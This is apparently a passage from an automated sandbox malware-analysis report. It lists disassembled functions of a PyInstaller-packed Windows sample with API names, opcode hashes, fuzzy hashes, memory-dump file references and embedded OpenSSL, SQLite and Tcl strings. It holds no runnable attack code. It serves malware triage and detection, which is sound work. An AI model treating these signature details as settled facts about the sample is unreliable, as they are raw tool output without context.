• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 999ebc8f07484b07a83fc52c905d4b3eee2c0c8223fc55abd532e99a9a53f8a9
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: D501A521A0C74180EA14EF93A945869E691FF85FE0FB84631DE6C17BDAEE3CD845C315
APIs
  • Part of subcall function 00007FF78DA59400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF78DA545E4,00000000,00007FF78DA51985), ref: 00007FF78DA59439
• LoadLibraryExW.KERNEL32(?,00007FF78DA56466,?,00007FF78DA5336E), ref: 00007FF78DA59092
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
• Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
• Instruction ID: b4514a8251dfe4291dc63fefefc13c8da92c824c3c1116e4c5ea95781558b5c6
• Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
• Instruction Fuzzy Hash: 8BD08611B2824541EA54B76775469359151BB89FC0EA88035EE4D07745ED3CC4458700
APIs
Memory Dump Source
• Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 4430eee199d92a379efecd2ae30cec23d508c2e698ff6cd2342d21caa557c0b1
• Instruction ID: 95670fc137a662020fed57ada426b9933b1d1dd6f97f14ee4d29178d6dac5c57
• Opcode Fuzzy Hash: 4430eee199d92a379efecd2ae30cec23d508c2e698ff6cd2342d21caa557c0b1
• Instruction Fuzzy Hash: F5217A3260878096E754CF26E5802ADB7A4FB88BD4F148135EB9C83B59CF7CD5A5CB00
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF78DA60D00,?,?,?,00007FF78DA6236A,?,?,?,?,?,00007FF78DA63B59), ref: 00007FF78DA6D6AA
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction ID: 8bf856e36d0fab902f34552de8ddf06b932d8ffd0053ef3b171e2e9ce2095c69
• Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction Fuzzy Hash: BFF03A48F1D30284FE5477B16801E7992907F54BE0FB80230DA2E852C1FE6CEC98C132
APIs
• _get_daylight.LIBCMT ref: 00007FF78DA75F1A
  • Part of subcall function 00007FF78DA75668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7567C
• _get_daylight.LIBCMT ref: 00007FF78DA75F2B
  • Part of subcall function 00007FF78DA75608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7561C
• _get_daylight.LIBCMT ref: 00007FF78DA75F3C
  • Part of subcall function 00007FF78DA75638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7564C
  • Part of subcall function 00007FF78DA6A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
  • Part of subcall function 00007FF78DA6A9B8: GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78DA7617C), ref: 00007FF78DA75F63
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
• Instruction ID: fea08cdac5ad3856041eb7e56a9f0c347b4476cbce18b31b0108825ba6bba921
• Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
• Instruction Fuzzy Hash: AE519332A0C64296E710FF31D8819A9E361BB48784FF48135DA9D47696FF3CE809C762
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
Similarity
                                                                                                                                                                                                                                        • API ID: 00007C61208
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\statem_srvr.c$resumption
                                                                                                                                                                                                                                        • API String ID: 3535234312-332775882
                                                                                                                                                                                                                                        • Opcode ID: 85d43697d99dd48070ad5557b0bfa7d5f884ce26e4a4b16b12b7706924855d9d
                                                                                                                                                                                                                                        • Instruction ID: ec3964a36832c4501dafeec03a10b2d163e80e3f7e31d76c81fc1d6f2acec256
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85d43697d99dd48070ad5557b0bfa7d5f884ce26e4a4b16b12b7706924855d9d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AB16E22A1EBC192EB50DF16D8847AA67B0EB85BD8F041039EE8D8B795DF7CD585C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                        • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction ID: f17b801c66fbee25e92912b887ae592251ef3577344d60a7e9617627fd5ad745
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B029064A0DB0BD1EA15BB95E814DB5A2A1BF04755BF40035D8AE622A4FF3CBD4DC332
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                                        • API String ID: 3568877910-554953066
                                                                                                                                                                                                                                        • Opcode ID: a10e177a3e85b3714625d66b2cd7fe7964119e7fc03f594d628cf93d522f3f03
                                                                                                                                                                                                                                        • Instruction ID: 36bc1c5546cb6c293e83df49bdf528c5d9b1816a36df758dceb41de5746c9466
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a10e177a3e85b3714625d66b2cd7fe7964119e7fc03f594d628cf93d522f3f03
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B32DB72B2AB82AAEB64DF25D4806AD37A4FB48BC4F404275DE4D43799DF38E450C714
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: new[]
                                                                                                                                                                                                                                        • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                        • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                        • Opcode ID: 637503c092be492cd4fda511486be557541f8ece5357f2cc4be0350b725c3a03
                                                                                                                                                                                                                                        • Instruction ID: 6d12c794e18ef4f8426e090fa7e03f88600e988cd533984b413f40867d1fdd6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 637503c092be492cd4fda511486be557541f8ece5357f2cc4be0350b725c3a03
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47510622E4E28667FB15EB6198056BA2B91EF44BC8F8C0435DD8D17792EF3CE4458339
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$a29f9949895322123f7c38fbe94c649a9d6e6c9cd0c3b41c96d694552f26b309$database corruption
                                                                                                                                                                                                                                        • API String ID: 3568877910-481979681
                                                                                                                                                                                                                                        • Opcode ID: a7d21024e195673058092d446b3059841ce808f720460b2c908ffec807c546ce
                                                                                                                                                                                                                                        • Instruction ID: 3e2306304e398e3e0362d5a647c87d682bb88c9427684100782df1313fb02d00
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7d21024e195673058092d446b3059841ce808f720460b2c908ffec807c546ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54D19B72B0AA8696DB60CF26E0056A977B4FB88BC8F158036DF4D47794DF39D842C724
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF78DA51B99), ref: 00007FF78DA52760
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                        • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction ID: a102679c207bf8e8a0f28fad2fd7a5f3d7ad7702f2b82e44d499fd2343d61ec9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4219572A1C78192E710EB50B841BE6A3A4FB887C4FA00131FE8D83659EF7CD949C751
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408466922.00007FF8A92E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9354000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9379000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A9384000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408503396.00007FF8A938E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408720209.00007FF8A9391000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007C61208
                                                                                                                                                                                                                                        • String ID: $..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                                        • API String ID: 3535234312-2024727245
                                                                                                                                                                                                                                        • Opcode ID: 04e235955fded6e715e2a9968c5ac263d3c2d904f0d42ba18503353ba86dd6e0
                                                                                                                                                                                                                                        • Instruction ID: a1d2861d8df6148c6551b419fce85ef0c506935ccba288e8f120a0e10dc412eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04e235955fded6e715e2a9968c5ac263d3c2d904f0d42ba18503353ba86dd6e0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35C18E36A0EAC2A2EB659F25D8947F927A1FB84BC4F141035DE1D8B7A5DF3CE5418B00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$a29f9949895322123f7c38fbe94c649a9d6e6c9cd0c3b41c96d694552f26b309$database corruption
                                                                                                                                                                                                                                        • API String ID: 3568877910-481979681
                                                                                                                                                                                                                                        • Opcode ID: 91451953014f13e3dad7351947cceb385dfc86b279026e58667cb497cc0ac13c
                                                                                                                                                                                                                                        • Instruction ID: a14a27d7b74a8a03459a9525296869ebe5e207cf3495ef4ebfebe14d843a0582
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91451953014f13e3dad7351947cceb385dfc86b279026e58667cb497cc0ac13c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E71B01390E1E662E368672AA1504BEBED1E750381F444232EFEA477D1CF6CEA44D738
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                        • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction ID: 29a24ee05253321d072c1ef32378a92ee49d4d47cac94239ae5a4f9535a6faa5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6519E22A1D6028ADF14AB55E444E38A7A1FB44B98FB48134DA5A87788EF3CEC45C711
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                        • Opcode ID: c00590035363e6c8fe05a9486c5a4b01939d56b231b01a2e093bb4448abb86cc
                                                                                                                                                                                                                                        • Instruction ID: e124c569ee0c8ac2c3d44524dbcf1e6e41ed29b8a47023b9171b3a469cf22061
